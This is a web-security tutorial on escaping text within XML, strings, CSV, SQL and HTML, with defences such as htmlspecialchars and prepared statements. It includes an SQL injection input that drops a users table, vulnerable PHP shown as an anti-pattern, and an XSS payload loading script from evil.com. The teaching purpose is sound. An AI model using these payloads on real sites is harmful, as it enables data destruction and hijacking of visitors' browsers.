The great escapism (or: what you need to know to work with text within text)

SQL injection attacks, cross-site request forgeries, broken XML, our friend O\'Connor. Scary, scary things that we would all like to protect ourselves against, if only we could wrap our head around the reason why they happen. This article explains the fundamental concept behind all of it: strings and escaping strings within strings.

The basic problem

It's all just text. There, that's it. That's the basic problem right there. Pretty much anything in a computer system is represented by text (which in turn is represented by bytes). Only that some text is meant to be consumed by the computer and other text by humans. They're both the same kind of text though. A quick example of what we're talking about:

<?xml version="1.0" encoding="UTF-8" ?>

<article>
    <author>David C. Zentgraf</author>
    <contents>
        Lorem ipsum dolor sit amet, consectetur adipisicing elit,
        sed do eiusmod tempor incididunt ut labore et dolore magna
        aliqua. Ut enim ad minim veniam, quis nostrud exercitation
        ullamco laboris nisi ut aliquip ex ea commodo consequat.
    </contents>
</article>

There, text. Some people call it XML, but it's just text. Perhaps we would not submit this to our English teacher like that (not least because it's not English), but it's still just text. You can print it in a book, you can write it in a letter to your mom, it's text.

Yet, we want certain parts of this text to have a special meaning to our computer. We want our computer to be able to extract the author of this text and the text itself separately so it can do something with it. Perhaps to transform the above into this:

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

by David C. Zentgraf

How would a computer know how to accomplish this? Well, because we helpfully surrounded certain parts of the text by words in funny brackets, like <author> and </author>. Because we did this, we can write a program that looks for these specific parts, extracts anything between them and uses that for something of our own devising.

In other words, we used certain conventions and rules within our text to signal some special meaning, which somebody following these rules can use to do something.

OK, fine, that's not so hard to understand. Neither should this be: What if we want to use the funny markers that signify some special meaning in our normal text without having them signify any special meaning? Like, say:

<?xml version="1.0" encoding="UTF-8" ?>

<article>
    <author>David C. Zentgraf</author>
    <contents>
        Basic math tells us that if x < n and y > n,
        x cannot be larger than y.
    </contents>
</article>

The characters "<" and ">" aren't anything special. They may legitimately be used anywhere in any written text like the above. That kind of clashes with our idea of wanting them to mean something special as in <author> though. Does that mean that in the above text, < n and y > means something special? In a general-purpose markup language like XML, it might. Or it mightn't. It's ambiguous. Since computers are bad with ambiguity though, something is likely to break if we don't clarify here.

To solve this dilemma, we replace the ambiguous characters with something unambiguous:

<?xml version="1.0" encoding="UTF-8" ?>

<article>
    <author>David C. Zentgraf</author>
    <contents>
        Basic math tells us that if x &lt; n and y &gt; n,
        x cannot be larger than y.
    </contents>
</article>

This is now completely unambiguous, as long as we follow these two rules:

  1. The characters < and > introduce text with special meaning.
  2. The text &lt; and &gt; really means < and > respectively.

The technical term for this is that we escaped the special characters when we don't want them to be special.

escape |iˈskāp|
verb

  1. [ no obj. ] break free from confinement or control
    • succeed in avoiding or eluding something dangerous, unpleasant, or undesirable
  2. [ with obj. ] fail to be noticed or remembered [...]
  3. [ with obj. ] Computing: cause to be interpreted differently [...]

If certain characters or character sequences in a text have a special meaning, there need to be rules that specify how to resolve situations where those characters should be used without invoking their special meaning. Or in other words, escaping answers the question "If those them characters are so special, then how can I use 'em in my text?"

As you may have noticed, in our little example above the & character has become special now as well. What if we wanted to write "&lt;" without it meaning "<"? The XML answer to that is that the escape sequence for the "&" character is &amp;. Hence, to write "&lt;", we need to write &amp;lt;.

Other examples

XML isn't the only case suffering from "special characters". Any source code in any programming language exhibits the same phenomenon:

var name     = "David C. Zentgraf";
var contents = "Lorem ipsum dolor sit amet, consectetur adipisicing elit,
                sed do eiusmod tempor incididunt ut labore et dolore magna
                aliqua. Ut enim ad minim veniam, quis nostrud exercitation
                ullamco laboris nisi ut aliquip ex ea commodo consequat.";

This is fairly simple actually. Literal text is clearly segregated from other "non-text" by surrounding double quotes. I can use my math example without any problems here:

var name     = "David C. Zentgraf";
var contents = "Basic math tells us that if x < n and y > n,
                x cannot be larger than y.";

Awesome! No need to escape anything here.

But wait, what if I wanted to quote somebody?

var name     = "David C. Zentgraf";
var contents = "Plato is said to once have said "Lorem ipsum
                dolor sit amet".";

Hmm, crap. As a human, you can probably tell where the contents text is supposed to start and end, but, again, it has become ambiguous for any computer. We need to come up with some escaping rules that help us differentiate between a literal " and a " that has the special meaning of segregating literal text from other text. Most programming languages use a preceding backslash for that:

var name     = "David C. Zentgraf";
var contents = "Plato is said to once have said \"Lorem ipsum
                dolor sit amet\".";

A \ makes the character following it "non-special". But that also means that the backslash is a special character now. To unambiguously write a backslash without it inadvertently escaping something, we need to write \\, which is the escape sequence that means \. Fun, ain't it?

There's also a cute little informal file format called CSV, which stands for "comma separated values". It's very simple:

Year,Earings,Losses
2010,$114.41,$12.65
2011,$653.54,$200.53

Each line represents a row in a spreadsheet or table with the different columns being separated by commas. Very nice, very simple. But that means that the comma is a character with a special meaning in this file format. What if the value of a column should contain a comma?

Year,Earings,Losses
2010,$114.41,$12.65
2011,$653.54,$200.53
2012,$1,323.23,$321.43

Why did we earn only a single dollar and what's the forth column for in that last line? Oh, wait, that's just a parsing error due to an ambiguous comma. We can solve this ambiguity by putting all ambiguous values into quotes:

Year,Earings,Losses
2010,$114.41,$12.65
2011,$653.54,$200.53
2012,"$1,323.23",$321.43

There, that should help.
Only, " is a character with a special meaning now. If we wanted to use a quote and a comma together in the same column, I'm afraid we need a rule on how to escape either of them...

It's hopeless!

I hope by now you have understood the basic problem. If your text has any characters that signify a special meaning, you will always have to deal with escaping rules. The easiest rule to apply would be that special characters are always special and you cannot use them for your own purposes. So no discussion about math in XML. No quotations by long-dead philosophers in any string literals. No formatted numbers in spreadsheets.
That's usually an unrealistic proposal though. What good is a file format that forbids me to use certain characters, especially ones so common as <, >, " or ,? The stupid file format should rather use less common characters!

⌫?xml version="1.0" encoding="UTF-8" ?⌦

⌫article⌦
    ⌫author⌦David C. Zentgraf⌫/author⌦
    ⌫contents⌦
        Basic math tells us that if x < n and y > n, x cannot be larger than y.
    ⌫/contents⌦
⌫/article⌦

There we go, much better. Nobody's using ⌫ or ⌦ anyway, except for a few eggheads maybe, right? The problem with using less commonly used "special characters" is still the same though. If you really needed to use those characters, you either couldn't, or you needed to escape them. Furthermore, how is anyone supposed to type those into the computer? And on top of it all, we are now required to use an encoding that can actually represent those uncommon characters, which is a deep, deep rabbit hole all in itself.

So special characters and escape sequences are here to stay, for better or for worse.

Attack!

It wouldn't all be half so bad if we just needed to escape a few characters here and there by hand. It's somewhat annoying, but not terribly so. The problems start when computer programs write text for other computer programs to read. And no, that's not science fiction, that's being done all the time. This very website you're reading has been constructed out of a Markdown formatted source, automatically transformed into HTML text and sent to your browser, which has read it and is displaying the result to you now. Nobody has hand-typed this HTML (because it's terribly tedious), a computer program has written the HTML that your browser is reading.

Another very common pattern and source of many many security problems: SQL queries. SQL is a (not so) small text-based language invented to make it easy for any program to talk to a database:

SELECT phone_number FROM users WHERE name = 'Frank'

Now that's text if I ever saw some. There's virtually no "special" special character in there, it's all basically English. And yet virtually every single word in that SQL sentence has a special meaning. This is being used in programming languages the world over in some form like this:

$query  = "SELECT phone_number FROM users WHERE name = 'Frank'";
$result = mysql_query($query);

These two simple lines abstract the terrifically complex task of one program asking another database program for data that matches certain requirements, that database sifting through possibly terabytes of bits and bytes to find that data and returning the results nicely formatted to the requesting program. Seriously, this is some complex shit happening right there, encapsulated in a simple English-like sentence.

To make this useful though, the particulars of a query are usually not hard-coded in a program, but are cobbled together at runtime (and here it comes) based on user input. This simple English-like sentence is written dynamically as needed under the direction of a human being, the user:

$name   = $_POST['name'];
$query  = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);

In case you're just skimming this article: This is an anti-pattern! This is the worst thing you could ever possibly do! This is a security nightmare! Kittens die en masse every time you write something like this! Cthulhu will devour your soul and kick your dog, too!

Having said that, let's examine what's happening here. $_POST['name'] is a value that some random user has typed into a random form on your random website. Your program is constructing an SQL query (one of those English-like sentence thingies) using that value as the name of the user you want to find in your database. It then sends that SQL "sentence" to the database which has to deal with it.

That doesn't sound so terrible now, does it? Let's try a few possible values that I might type into your random website and what kind of SQL query would result from that:

Frank
SELECT phone_number FROM users WHERE name = 'Frank'
John
SELECT phone_number FROM users WHERE name = 'John'
O'Connor
SELECT phone_number FROM users WHERE name = 'O'Connor'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

Number 1 and 2 aren't so bad, right? Number 3 seems to break our syntax with the ambiguous '. Damn Irish. Number 4 is outright wacky. Who would do such a thing? It doesn't make any sense...

Except it does to the database that's handling the query. The database has no idea where that query came from or what it was supposed to mean. It only sees that two requests are made of it: find the phone number of a user named "Joe", then delete the users table (which is followed by the comment '). And it will happily comply.

All this shouldn't be entirely news to you. If it is, please read this article again from the beginning now, since you're either very new to programming or have lived under a rock for the past few decades. This example illustrates the basics of an SQL injection attack used the world over to mischievously delete data, suspiciously grab data that wasn't supposed to be grabbed and to maliciously log into systems without possessing access credentials. And all because a database is taking a small English-like sentence a bit too literally.

Chaaaaaaarge!

Next up: XSS attacks. They're enabled through the exact same mechanism, only applied to HTML.

Say you solved your database problems and are actually accepting user input, storing it in your database and are outputting it back onto your website to show to other users. That's what a typical forum, bulletin board or commenting system does. Somewhere in your site you have something along these lines:

<div class="post">
    <p class="meta">
        Posted by <?php echo $post['username']; ?>
        on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo $post['body']; ?>
    </p>
</div>

If your users are nice, they'll quote old philosophers and the posts will look like this:

<div class="post">
    <p class="meta">
        Posted by Plato
        on January 2, 15:31
    </p>
    <p class="body">
        I am said to have said "Lorem ipsum dolor sit amet,
        consectetur adipisicing elit, sed do eiusmod tempor
        incididunt ut labore et dolore magna aliqua. Ut enim
        ad minim veniam, quis nostrud exercitation ullamco
        laboris nisi ut aliquip ex ea commodo consequat."
    </p>
</div>

If your users are eggheads, they'll talk about math and the posts will look something like this:

<div class="post">
    <p class="meta">
        Posted by Pascal
        on November 23, 04:12
    </p>
    <p class="body">
        Basic math tells us that if x < n and y > n,
        x cannot be larger than y.
    </p>
</div>

Hmm, there we have those troubling brackets again. Well, technically speaking they may be ambiguous, but the browser will forgive us this one, right?

<div class="post">
    <p class="meta">
        Posted by JackTR
        on July 18, 12:56
    </p>
    <p class="body">
        <script src="http://evil.com/dangerous.js"
            type="text/javascript" charset="utf-8"></script>
    </p>
</div>

OK, wait, what just happened? Some joker actually input a Javascript tag into your forum. Anybody looking at this post now downloads and executes a script in the context of your site, which might do who-knows-what. That ain't good.

Not to be taken literally

In both the above cases, we just want some way to tell our database and the browser respectively that this part here is just some value, you're not supposed to do anything with it! In other words, we want to remove the special meaning any characters may have in any of the data a user gives us, because we don't know and don't trust what the user gives us.

...

Yes, you there, in front of the computer. What's that? "Escaping" you say? Why yes, that's the correct answer! Take a cookie.

If we escape any user data before we merge it with the rest of our text, the problem is solved. For our database queries, this would look like this:

$name   = $_POST['name'];
$name   = mysql_real_escape_string($name);
$query  = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);

Just one more line of code, but now nobody can "hack" our database anymore. Let's see again how different user input turns into SQL queries:

Frank
SELECT phone_number FROM users WHERE name = 'Frank'
John
SELECT phone_number FROM users WHERE name = 'John'
O'Connor
SELECT phone_number FROM users WHERE name = 'O\'Connor'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

Just a tiny \ makes all the difference. It helps our friend O'Connor (blessed be the Irish) to write his name into our database and subverts attacks against our database at the same time. Even little Bobby Tables can sign into our forum now. mysql_real_escape_string indiscriminately puts a backslash in front of anything that may have some special meaning. What exactly those special characters are depends on your database version, character set and the moon phase, and mysql_real_escape_string tries to handle all of that correctly. Which is to say, it's not as simple as replacing all occurrences of ' with \' yourself, so don't try it.

Next up, we change our forum script to this:

<div class="post">
    <p class="meta">
        Posted by <?php echo htmlspecialchars($post['username']); ?>
        on <?php echo date('F j, H:i', $post['date']); ?>
    </p>
    <p class="body">
        <?php echo htmlspecialchars($post['body']); ?>
    </p>
</div>

We apply the htmlspecialchars function to all user data before outputting it. That simply applies the HTML/XML escaping rules we discussed at the very beginning.

<div class="post">
    <p class="meta">
        Posted by Plato
        on January 2, 15:31
    </p>
    <p class="body">
        I am said to have said &quot;Lorem ipsum dolor sit amet,
        consectetur adipisicing elit, sed do eiusmod tempor
        incididunt ut labore et dolore magna aliqua. Ut enim
        ad minim veniam, quis nostrud exercitation ullamco
        laboris nisi ut aliquip ex ea commodo consequat.&quot;
    </p>
</div>

The quotation marks are replaced by &quot;. This wasn't strictly necessary here, but in some contexts the double quote is a special character in HTML (for example in class="body"), so htmlspecialchars escapes it.

<div class="post">
    <p class="meta">
        Posted by Pascal
        on November 23, 04:12
    </p>
    <p class="body">
        Basic math tells us that if x &lt; n and y &gt; n,
        x cannot be larger than y.
    </p>
</div>

The angle brackets were made unambiguous by replacing them with &lt; and &gt;.

<div class="post">
    <p class="meta">
        Posted by JackTR
        on July 18, 12:56
    </p>
    <p class="body">
        &lt;script src=&quot;http://evil.com/dangerous.js&quot;
            type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
    </p>
</div>

And our joker's attempt at injecting some Javascript into our page was subverted as well by escaping anything that would give the <script> tag its special meaning. Now it's all really just text.

Please note that the values are not "broken". They may appear garbled in the example above, but they will appear exactly as they should. Any browser that's parsing this HTML to display a nice webpage will follow the escaping rules laid out at the very beginning:

  1. The characters < and > introduce text with special meaning.
  2. Any &lt; and &gt; really means < and > respectively.

(Actually, there should be a third rule regarding &quot; now, but you get the idea...)

The same goes for our database queries. Our friend O'Connor will be saved to the database as "O'Connor", not as "O\'Connor". To the database that's reading the SQL query to figure out what it's supposed to do, the \ has the special meaning of "the following character has no special meaning". The special character \ itself is not saved to the database. Yes, with "special characters" it goes round and round in circles. Some extreme outgrowth of that is that the text "\\'\'" is escaped to \\\\\'\\\'. The \ escapes the \ which escapes the not-escaping \\ which... Oh, whatever. That is why you should not do this yourself but use a specialized escaping function that has no mind to boggle but knows what it's doing.

Which brings us back to...

All the above demonstrates a problem common to many systems: Text within text needs to be escaped if it's not supposed to have any special meaning. Putting text values into SQL queries, these text values need to be escaped according to SQL escaping rules. Putting text values into HTML output, these text values need to be escaped according to HTML escaping rules. Putting text values into CSV files, these text values need to be escaped according to CSV escaping rules. Putting text values into JSON strings, these text values need to be escaped according to JSON escaping rules. Putting text values into (name of technology) strings, these text values need to be escaped according to (name of technology) escaping rules. That's all there is to it.

Because it's all just text. You may know that this part there is not supposed to be taken literally, but a computer that's only given a piece of text can't know and won't know. That's what escaping rules were invented for, which a computer can follow very nicely. You only need to understand this concept once, it can be applied to virtually any text format used in virtually any computer system to date.

For the sake of completeness

There are of course other ways to deal with user input which may or may not contain "special characters":

Validation
You may validate whether some user input conforms to certain specifications. If you require a user to enter a number, but the user enters something that does not look like a number, the program should complain to the user and reject the input. If that works correctly, there should be no risk of a user entering "DROP TABLE users" where he was supposed to enter a harmless "42". This is not very practical to avoid HTML/SQL injection though, since oftentimes you want and need to accept any sort of freeform text which often legitimately can contain "special characters". You usually want to use validation in addition to other measures.
Sanitization
You may also simply silently remove any characters you deem "dangerous" from any user input. For example, simply delete anything that looks like an HTML tag to avoid users adding <script> tags into your forum. The problem with sanitizing text is that you may indiscriminately drop legitimate values. It can also be rather difficult to get right, i.e. to catch every last possible permutation of special characters. This is extremely difficult to get right if you want to allow your users to use some special characters but not others, e.g. you want to allow your forum users to use the <em> tag but not the <a> tag. If you go for sanitization, use some well-tested library that's specialized in sanitizing text. This particular wheel can be very time consuming and difficult to reinvent.
Prepared SQL statements

Specifically for SQL queries, there are also prepared statements. These do exactly what you wanted all along: make the database understand the difference between your part of the SQL query and the user supplied values. In PHP, they look something like this:

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute($_POST['name']);

This sends the query to the database in a two-step process which clearly distinguishes between the query and the value. The database has a chance to understand the structure of the query first and fill in the values afterwards. This should be the preferred method to interact with databases in this day and age, since it avoids the messy issue of escaping altogether.

In the real world, you use all these techniques together to varying degrees. You should always use validation to make sure the user is inputting what he's supposed to be inputting. If you ask the user for an email address, you should make sure that what you're getting at least looks like a valid email address. Next, you may or may not want to sanitize any input. If a user is clearly trying to inject some Javascript into your forum, you may just want to delete it. Unless of course you have a forum where people may legitimately want to talk about Javascript. As said above, sanitization is a tricky business. Next, you always, always SQL-escape any user values before putting them into SQL queries or, alternatively, use prepared statements. Last but not least, you should HTML escape any text of unknown quality when outputting to HTML (or JSON encode when outputting to JSON, or CSV escape when outputting to CSV etc.).

What not to do

About the author

David C. Zentgraf is a web developer working partly in Japan and Europe and is a regular on Stack Overflow. If you have feedback, criticism or additions, please feel free to try @deceze on Twitter, take an educated guess at his email address or look it up using time-honored methods. This article was published on kunststube.net. And no, there is no dirty word in "Kunststube".